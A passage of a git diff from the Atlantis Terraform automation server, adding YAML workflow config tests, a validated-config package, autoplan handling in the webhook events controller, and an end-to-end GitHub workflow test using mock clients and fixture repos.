+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestWorkflow_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Workflow
+ expErr string
+ }{
+ {
+ description: "empty",
+ input: ``,
+ exp: raw.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "yaml null",
+ input: `~`,
+ exp: raw.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "only plan/apply set",
+ input: `
+plan:
+apply:
+`,
+ exp: raw.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "steps set to null",
+ input: `
+plan:
+ steps: ~
+apply:
+ steps: ~`,
+ exp: raw.Workflow{
+ Plan: &raw.Stage{
+ Steps: nil,
+ },
+ Apply: &raw.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ {
+ description: "steps set to empty slice",
+ input: `
+plan:
+ steps: []
+apply:
+ steps: []`,
+ exp: raw.Workflow{
+ Plan: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ Apply: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var w raw.Workflow
+ err := yaml.UnmarshalStrict([]byte(c.input), &w)
+ if c.expErr != "" {
+ ErrEquals(t, c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, w)
+ })
+ }
+}
+
+func TestWorkflow_Validate(t *testing.T) {
+ // Should call the validate of Stage.
+ w := raw.Workflow{
+ Apply: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("invalid"),
+ },
+ },
+ },
+ }
+ validation.ErrorTag = "yaml"
+ ErrEquals(t, "apply: (steps: (0: \"invalid\" is not a valid step type.).).", w.Validate())
+
+ // Unset keys should validate.
+ Ok(t, (raw.Workflow{}).Validate())
+}
+
+func TestWorkflow_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Workflow
+ exp valid.Workflow
+ }{
+ {
+ description: "nothing set",
+ input: raw.Workflow{},
+ exp: valid.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "fields set",
+ input: raw.Workflow{
+ Apply: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ Plan: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ },
+ exp: valid.Workflow{
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
new file mode 100644
index 0000000000..8046c0fa05
--- /dev/null
+++ b/server/events/yaml/valid/valid.go
@@ -0,0 +1,81 @@
+// Package valid contains the structs representing the atlantis.yaml config
+// after it's been parsed and validated.
+package valid
+
+import "github.com/hashicorp/go-version"
+
+// Config is the atlantis.yaml config after it's been parsed and validated.
+type Config struct {
+ // Version is the version of the atlantis YAML file. Will always be equal
+ // to 2.
+ Version int
+ Projects []Project
+ Workflows map[string]Workflow
+}
+
+func (c Config) GetPlanStage(workflowName string) *Stage {
+ for name, flow := range c.Workflows {
+ if name == workflowName {
+ return flow.Plan
+ }
+ }
+ return nil
+}
+
+func (c Config) GetApplyStage(workflowName string) *Stage {
+ for name, flow := range c.Workflows {
+ if name == workflowName {
+ return flow.Apply
+ }
+ }
+ return nil
+}
+
+func (c Config) FindProjectsByDirWorkspace(dir string, workspace string) []Project {
+ var ps []Project
+ for _, p := range c.Projects {
+ if p.Dir == dir && p.Workspace == workspace {
+ ps = append(ps, p)
+ }
+ }
+ return ps
+}
+
+func (c Config) FindProjectByName(name string) *Project {
+ for _, p := range c.Projects {
+ if p.Name != nil && *p.Name == name {
+ return &p
+ }
+ }
+ return nil
+}
+
+type Project struct {
+ Dir string
+ Workspace string
+ Name *string
+ Workflow *string
+ TerraformVersion *version.Version
+ Autoplan Autoplan
+ ApplyRequirements []string
+}
+
+type Autoplan struct {
+ WhenModified []string
+ Enabled bool
+}
+
+type Stage struct {
+ Steps []Step
+}
+
+type Step struct {
+ StepName string
+ ExtraArgs []string
+ RunCommand []string
+}
+
+type Workflow struct {
+ Apply *Stage
+ Plan *Stage
+}
diff --git a/server/events_controller.go b/server/events_controller.go
index b5a447be14..f666e1e329 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -29,7 +29,7 @@ const githubHeader = "X-Github-Event"
const gitlabHeader = "X-Gitlab-Event"
// EventsController handles all webhook requests which signify 'events' in the
-// VCS host, ex. GitHub. It's split out from Server to make testing easier.
+// VCS host, ex. GitHub.
type EventsController struct {
CommandRunner events.CommandRunner
PullCleaner events.PullCleaner
@@ -39,18 +39,19 @@ type EventsController struct {
// GithubWebHookSecret is the secret added to this webhook via the GitHub
// UI that identifies this call as coming from GitHub. If empty, no
// request validation is done.
- GithubWebHookSecret []byte
- GithubRequestValidator GithubRequestValidator
- GitlabRequestParser GitlabRequestParser
+ GithubWebHookSecret []byte
+ GithubRequestValidator GithubRequestValidator
+ GitlabRequestParserValidator GitlabRequestParserValidator
// GitlabWebHookSecret is the secret added to this webhook via the GitLab
// UI that identifies this call as coming from GitLab. If empty, no
// request validation is done.
- GitlabWebHookSecret []byte
- RepoWhitelist *events.RepoWhitelist
+ GitlabWebHookSecret []byte
+ RepoWhitelistChecker *events.RepoWhitelistChecker
// SupportedVCSHosts is which VCS hosts Atlantis was configured upon
// startup to support.
SupportedVCSHosts []models.VCSHostType
VCSClient vcs.ClientProxy
+ TestingMode bool
}
// Post handles POST webhook requests.
@@ -60,6 +61,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) {
e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitHub")
return
}
+ e.Logger.Debug("handling GitHub post")
e.handleGithubPost(w, r)
return
} else if r.Header.Get(gitlabHeader) != "" {
@@ -67,6 +69,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) {
e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitLab")
return
}
+ e.Logger.Debug("handling GitLab post")
e.handleGitlabPost(w, r)
return
}
@@ -80,13 +83,16 @@ func (e *EventsController) handleGithubPost(w http.ResponseWriter, r *http.Reque
e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
return
}
+ e.Logger.Debug("request valid")
githubReqID := "X-Github-Delivery=" + r.Header.Get("X-Github-Delivery")
event, _ := github.ParseWebHook(github.WebHookType(r), payload)
switch event := event.(type) {
case *github.IssueCommentEvent:
+ e.Logger.Debug("handling as comment event")
e.HandleGithubCommentEvent(w, event, githubReqID)
case *github.PullRequestEvent:
+ e.Logger.Debug("handling as pull request event")
e.HandleGithubPullRequestEvent(w, event, githubReqID)
default:
e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event %s", githubReqID)
@@ -107,57 +113,100 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event
return
}
- // We pass in an empty models.Repo for headRepo because we need to do additional
- // calls to get that information but we need this code path to be generic.
- // Later on in CommandHandler we detect that this is a GitHub event and
- // make the necessary calls to get the headRepo.
- e.handleCommentEvent(w, baseRepo, models.Repo{}, user, pullNum, event.Comment.GetBody(), models.Github)
+ // We pass in nil for maybeHeadRepo because the head repo data isn't
+ // available in the GithubIssueComment event.
+ e.handleCommentEvent(w, baseRepo, nil, user, pullNum, event.Comment.GetBody(), models.Github)
}
// HandleGithubPullRequestEvent will delete any locks associated with the pull
// request if the event is a pull request closed event. It's exported to make
// testing easier.
func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) {
- pull, _, err := e.Parser.ParseGithubPull(pullEvent.PullRequest)
+ pull, baseRepo, headRepo, user, err := e.Parser.ParseGithubPullEvent(pullEvent)
if err != nil {
e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID)
return
}
- repo, err := e.Parser.ParseGithubRepo(pullEvent.Repo)
- if err != nil {
- e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID)
- return
+ var eventType string
+ switch pullEvent.GetAction() {
+ case "opened":
+ eventType = OpenPullEvent
+ case "synchronize":
+ eventType = UpdatedPullEvent
+ case "closed":
+ eventType = ClosedPullEvent
+ default:
+ eventType = OtherPullEvent
}
- e.handlePullRequestEvent(w, repo, pull)
+ e.Logger.Info("identified event as type %q", eventType)
+ e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType)
}
-func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, repo models.Repo, pull models.PullRequest) {
- if !e.RepoWhitelist.IsWhitelisted(repo.FullName, repo.VCSHost.Hostname) {
+const OpenPullEvent = "opened"
+const UpdatedPullEvent = "updated"
+const ClosedPullEvent = "closed"
+const OtherPullEvent = "other"
+
+func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) {
+ if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+ // If the repo isn't whitelisted and we receive an opened pull request
+ // event we comment back on the pull request that the repo isn't
+ // whitelisted. This is because the user might be expecting Atlantis to
+ // autoplan. For other events, we just ignore them.
+ if eventType == OpenPullEvent {
+ e.commentNotWhitelisted(baseRepo, pull.Num)
+ }
e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
return
}
- if pull.State != models.Closed {
- e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event")
+
+ switch eventType {
+ case OpenPullEvent, UpdatedPullEvent:
+ // If the pull request was opened or updated, we will try to autoplan.
+
+ // Respond with success and then actually execute the command asynchronously.
+ // We use a goroutine so that this function returns and the connection is
+ // closed.
+ fmt.Fprintln(w, "Processing...")
+
+ e.Logger.Info("executing autoplan")
+ if !e.TestingMode {
+ go e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user)
+ } else {
+ // When testing we want to wait for everything to complete.
+ e.CommandRunner.RunAutoplanCommand(baseRepo, headRepo, pull, user)
+ }
return
- }
- if err := e.PullCleaner.CleanUpPull(repo, pull); err != nil {
- e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err)
+ case ClosedPullEvent:
+ // If the pull request was closed, we delete locks.
+ if err := e.PullCleaner.CleanUpPull(baseRepo, pull); err != nil {
+ e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err)
+ return
+ }
+ e.Logger.Info("deleted locks and workspace for repo %s, pull %d", baseRepo.FullName, pull.Num)
+ fmt.Fprintln(w, "Pull request cleaned successfully")
+ return
+ case OtherPullEvent:
+ // Else we ignore the event.
+ e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-actionable pull request event")
return
}
- e.Logger.Info("deleted locks and workspace for repo %s, pull %d", repo.FullName, pull.Num)
- fmt.Fprintln(w, "Pull request cleaned successfully")
}
func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) {
- event, err := e.GitlabRequestParser.Validate(r, e.GitlabWebHookSecret)
+ event, err := e.GitlabRequestParserValidator.ParseAndValidate(r, e.GitlabWebHookSecret)
if err != nil {
e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
return
}
+ e.Logger.Debug("request valid")
+
switch event := event.(type) {
case gitlab.MergeCommentEvent:
+ e.Logger.Debug("handling as comment event")
e.HandleGitlabCommentEvent(w, event)
case gitlab.MergeEvent:
+ e.Logger.Debug("handling as pull request event")
e.HandleGitlabMergeRequestEvent(w, event)
default:
e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event")
@@ -173,10 +222,10 @@ func (e *EventsController) HandleGitlabCommentEvent(w http.ResponseWriter, event
e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
return
}
- e.handleCommentEvent(w, baseRepo, headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab)
+ e.handleCommentEvent(w, baseRepo, &headRepo, user, event.MergeRequest.IID, event.ObjectAttributes.Note, models.Gitlab)
}
-func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) {
+func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, comment string, vcsHost models.VCSHostType) {
parseResult := e.CommentParser.Parse(comment, vcsHost)
if parseResult.Ignore {
truncated := comment
@@ -187,14 +236,12 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated)
return
}
+ e.Logger.Info("parsed comment as %s", parseResult.Command)
// At this point we know it's a command we're not supposed to ignore, so now
// we check if this repo is allowed to run commands in the first place.
- if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
- errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
- if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
- e.Logger.Err("unable to comment on pull request: %s", err)
- }
+ if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+ e.commentNotWhitelisted(baseRepo, pullNum)
e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted")
return
}
@@ -211,23 +258,41 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
return
}
- // Respond with success and then actually execute the command asynchronously.
- // We use a goroutine so that this function returns and the connection is
- // closed.
+ e.Logger.Debug("executing command")
fmt.Fprintln(w, "Processing...")
- go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+ if !e.TestingMode {
+ // Respond with success and then actually execute the command asynchronously.
+ // We use a goroutine so that this function returns and the connection is
+ // closed.
+ go e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command)
+ } else {
+ // When testing we want to wait for everything to complete.
+ e.CommandRunner.RunCommentCommand(baseRepo, maybeHeadRepo, user, pullNum, parseResult.Command)
+ }
}
// HandleGitlabMergeRequestEvent will delete any locks associated with the pull
// request if the event is a merge request closed event. It's exported to make
// testing easier.
func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) {
- pull, repo, err := e.Parser.ParseGitlabMergeEvent(event)
+ pull, baseRepo, headRepo, user, err := e.Parser.ParseGitlabMergeEvent(event)
if err != nil {
e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
return
}
- e.handlePullRequestEvent(w, repo, pull)
+ var eventType string
+ switch event.ObjectAttributes.Action {
+ case "open":
+ eventType = OpenPullEvent
+ case "update":
+ eventType = UpdatedPullEvent
+ case "merge", "close":
+ eventType = ClosedPullEvent
+ default:
+ eventType = OtherPullEvent
+ }
+ e.Logger.Info("identified event as type %q", eventType)
+ e.handlePullRequestEvent(w, baseRepo, headRepo, pull, user, eventType)
}
// supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise.
@@ -246,3 +311,12 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel,
w.WriteHeader(code)
fmt.Fprintln(w, response)
}
+
+// commentNotWhitelisted comments on the pull request that the repo is not
+// whitelisted.
+func (e *EventsController) commentNotWhitelisted(baseRepo models.Repo, pullNum int) {
+ errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
+ if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
+ e.Logger.Err("unable to comment on pull request: %s", err)
+ }
+}
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
new file mode 100644
index 0000000000..d69471cb23
--- /dev/null
+++ b/server/events_controller_e2e_test.go
@@ -0,0 +1,452 @@
+package server_test
+
+import (
+ "bytes"
+ "fmt"
+ "io/ioutil"
+ "net/http"
+ "net/http/httptest"
+ "os"
+ "os/exec"
+ "path/filepath"
+ "regexp"
+ "strings"
+ "testing"
+
+ "github.com/google/go-github/github"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/locking"
+ "github.com/runatlantis/atlantis/server/events/locking/boltdb"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform"
+ vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+ "github.com/runatlantis/atlantis/server/events/webhooks"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestGitHubWorkflow(t *testing.T) {
+ if testing.Short() {
+ t.SkipNow()
+ }
+ RegisterMockTestingT(t)
+
+ cases := []struct {
+ Description string
+ // RepoDir is relative to testfixtures/test-repos.
+ RepoDir string
+ ModifiedFiles []string
+ ExpAutoplanCommentFile string
+ ExpMergeCommentFile string
+ CommentAndReplies []string
+ }{
+ {
+ Description: "simple",
+ RepoDir: "simple",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply", "exp-output-apply.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "simple with comment -var",
+ RepoDir: "simple",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt",
+ "atlantis apply", "exp-output-apply-var.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "simple with workspaces",
+ RepoDir: "simple",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt",
+ "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt",
+ "atlantis apply", "exp-output-apply-var-default-workspace.txt",
+ "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge-workspaces.txt",
+ },
+ {
+ Description: "simple with atlantis.yaml",
+ RepoDir: "simple-yaml",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -w staging", "exp-output-apply-staging.txt",
+ "atlantis apply", "exp-output-apply-default.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "modules staging only",
+ RepoDir: "modules",
+ ModifiedFiles: []string{"staging/main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan-only-staging.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -d staging", "exp-output-apply-staging.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge-only-staging.txt",
+ },
+ {
+ Description: "modules modules only",
+ RepoDir: "modules",
+ ModifiedFiles: []string{"modules/null/main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan-only-modules.txt",
+ CommentAndReplies: []string{
+ "atlantis plan -d staging", "exp-output-plan-staging.txt",
+ "atlantis plan -d production", "exp-output-plan-production.txt",
+ "atlantis apply -d staging", "exp-output-apply-staging.txt",
+ "atlantis apply -d production", "exp-output-apply-production.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge-all-dirs.txt",
+ },
+ {
+ Description: "modules-yaml",
+ RepoDir: "modules-yaml",
+ ModifiedFiles: []string{"modules/null/main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -d staging", "exp-output-apply-staging.txt",
+ "atlantis apply -d production", "exp-output-apply-production.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "tfvars-yaml",
+ RepoDir: "tfvars-yaml",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+ CommentAndReplies: []string{
+ "atlantis apply -p staging", "exp-output-apply-staging.txt",
+ "atlantis apply -p default", "exp-output-apply-default.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ {
+ Description: "tfvars no autoplan",
+ RepoDir: "tfvars-yaml-no-autoplan",
+ ModifiedFiles: []string{"main.tf"},
+ ExpAutoplanCommentFile: "",
+ CommentAndReplies: []string{
+ "atlantis plan -p staging", "exp-output-plan-staging.txt",
+ "atlantis plan -p default", "exp-output-plan-default.txt",
+ "atlantis apply -p staging", "exp-output-apply-staging.txt",
+ "atlantis apply -p default", "exp-output-apply-default.txt",
+ },
+ ExpMergeCommentFile: "exp-output-merge.txt",
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
+ // Set the repo to be cloned through the testing backdoor.
+ repoDir, headSHA, cleanup := initializeRepo(t, c.RepoDir)
+ defer cleanup()
+ atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir)
+
+ // Setup test dependencies.
+ w := httptest.NewRecorder()
+ When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(headSHA), nil)
+ When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil)
+
+ // First, send the open pull request event and trigger an autoplan.
+ pullOpenedReq := GitHubPullRequestOpenedEvent(t, headSHA)
+ ctrl.Post(w, pullOpenedReq)
+ responseContains(t, w, 200, "Processing...")
+ if c.ExpAutoplanCommentFile != "" {
+ _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir)
+ }
+
+ // Now send any other comments.
+ for i := 0; i < len(c.CommentAndReplies); i += 2 {
+ comment := c.CommentAndReplies[i]
+ expOutputFile := c.CommentAndReplies[i+1]
+
+ commentReq := GitHubCommentEvent(t, comment)
+ w = httptest.NewRecorder()
+ ctrl.Post(w, commentReq)
+ responseContains(t, w, 200, "Processing...")
+ _, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ assertCommentEquals(t, expOutputFile, atlantisComment, c.RepoDir)
+ }
+
+ // Finally, send the pull request merged event.
+ pullClosedReq := GitHubPullRequestClosedEvent(t)
+ w = httptest.NewRecorder()
+ ctrl.Post(w, pullClosedReq)
+ responseContains(t, w, 200, "Pull request cleaned successfully")
+ numPrevComments := (len(c.CommentAndReplies) / 2) + 1
+ _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ assertCommentEquals(t, c.ExpMergeCommentFile, pullClosedComment, c.RepoDir)
+ })
+ }
+}
+
+func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, *mocks.MockGithubPullGetter, *events.FileWorkspace) {
+ allowForkPRs := false
+ dataDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ // Mocks.
+ e2eVCSClient := vcsmocks.NewMockClientProxy()
+ e2eStatusUpdater := mocks.NewMockCommitStatusUpdater()
+ e2eGithubGetter := mocks.NewMockGithubPullGetter()
+ e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter()
+
+ // Real dependencies.
+ logger := logging.NewSimpleLogger("server", nil, true, logging.Debug)
+ eventParser := &events.EventParser{
+ GithubUser: "github-user",
+ GithubToken: "github-token",
+ GitlabUser: "gitlab-user",
+ GitlabToken: "gitlab-token",
+ }
+ commentParser := &events.CommentParser{
+ GithubUser: "github-user",
+ GithubToken: "github-token",
+ GitlabUser: "gitlab-user",
+ GitlabToken: "gitlab-token",
+ }
+ terraformClient, err := terraform.NewClient(dataDir)
+ Ok(t, err)
+ boltdb, err := boltdb.New(dataDir)
+ Ok(t, err)
+ lockingClient := locking.NewClient(boltdb)
+ projectLocker := &events.DefaultProjectLocker{
+ Locker: lockingClient,
+ }
+ workingDir := &events.FileWorkspace{
+ DataDir: dataDir,
+ TestingOverrideCloneURL: "override-me",
+ }
+
+ defaultTFVersion := terraformClient.Version()
+ locker := events.NewDefaultWorkingDirLocker()
+ commandRunner := &events.DefaultCommandRunner{
+ ProjectCommandRunner: &events.DefaultProjectCommandRunner{
+ Locker: projectLocker,
+ LockURLGenerator: &mockLockURLGenerator{},
+ InitStepRunner: &runtime.InitStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTFVersion,
+ },
+ PlanStepRunner: &runtime.PlanStepRunner{
+ TerraformExecutor: terraformClient,
+ DefaultTFVersion: defaultTFVersion,
+ },
+ ApplyStepRunner: &runtime.ApplyStepRunner{
+ TerraformExecutor: terraformClient,
+ },
+ RunStepRunner: &runtime.RunStepRunner{
+ DefaultTFVersion: defaultTFVersion,
+ },
+ PullApprovedChecker: e2eVCSClient,
+ WorkingDir: workingDir,
+ Webhooks: &mockWebhookSender{},
+ WorkingDirLocker: locker,
+ },
+ EventParser: eventParser,
+ VCSClient: e2eVCSClient,
+ GithubPullGetter: e2eGithubGetter,
+ GitlabMergeRequestGetter: e2eGitlabGetter,
+ CommitStatusUpdater: e2eStatusUpdater,
+ MarkdownRenderer: &events.MarkdownRenderer{},
+ Logger: logger,
+ AllowForkPRs: allowForkPRs,
+ AllowForkPRsFlag: "allow-fork-prs",
+ ProjectCommandBuilder: &events.DefaultProjectCommandBuilder{
+ ParserValidator: &yaml.ParserValidator{},
+ ProjectFinder: &events.DefaultProjectFinder{},
+ VCSClient: e2eVCSClient,
+ WorkingDir: workingDir,
+ WorkingDirLocker: locker,
+ AllowRepoConfigFlag: "allow-repo-config",
+ AllowRepoConfig: true,
+ },
+ }
+
+ ctrl := server.EventsController{
+ TestingMode: true,
+ CommandRunner: commandRunner,
+ PullCleaner: &events.PullClosedExecutor{
+ Locker: lockingClient,
+ VCSClient: e2eVCSClient,
+ WorkingDir: workingDir,
+ },
+ Logger: logger,
+ Parser: eventParser,
+ CommentParser: commentParser,
+ GithubWebHookSecret: nil,
+ GithubRequestValidator: &server.DefaultGithubRequestValidator{},
+ GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
+ GitlabWebHookSecret: nil,
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{
+ Whitelist: "*",
+ },
+ SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github},
+ VCSClient: e2eVCSClient,
+ }
+ return ctrl, e2eVCSClient, e2eGithubGetter, workingDir
+}
+
+type mockLockURLGenerator struct{}
+
+func (m *mockLockURLGenerator) GenerateLockURL(lockID string) string {
+ return "lock-url"
+}
+
+type mockWebhookSender struct{}
+
+func (w *mockWebhookSender) Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error {
+ return nil
+}
+
+func GitHubCommentEvent(t *testing.T, comment string) *http.Request {
+ requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent.json"))
+ Ok(t, err)
+ requestJSON = []byte(strings.Replace(string(requestJSON), "###comment body###", comment, 1))
+ req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+ Ok(t, err)
+ req.Header.Set("Content-Type", "application/json")
+ req.Header.Set(githubHeader, "issue_comment")
+ return req
+}
+
+func GitHubPullRequestOpenedEvent(t *testing.T, headSHA string) *http.Request {
+ requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json"))
+ Ok(t, err)
+ // Replace sha with expected sha.
+ requestJSONStr := strings.Replace(string(requestJSON), "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", headSHA, -1)
+ req, err := http.NewRequest("POST", "/events", bytes.NewBuffer([]byte(requestJSONStr)))
+ Ok(t, err)
+ req.Header.Set("Content-Type", "application/json")
+ req.Header.Set(githubHeader, "pull_request")
+ return req
+}
+
+func GitHubPullRequestClosedEvent(t *testing.T) *http.Request {
+ requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestClosedEvent.json"))
+ Ok(t, err)
+ req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+ Ok(t, err)
+ req.Header.Set("Content-Type", "application/json")
+ req.Header.Set(githubHeader, "pull_request")
+ return req
+}
+
+func GitHubPullRequestParsed(headSHA string) *github.PullRequest {
+ // headSHA can't be empty so default if not set.
+ if headSHA == "" {
+ headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d"
+ }
+ return &github.PullRequest{
+ Number: github.Int(2),
+ State: github.String("open"),
+ HTMLURL: github.String("htmlurl"),
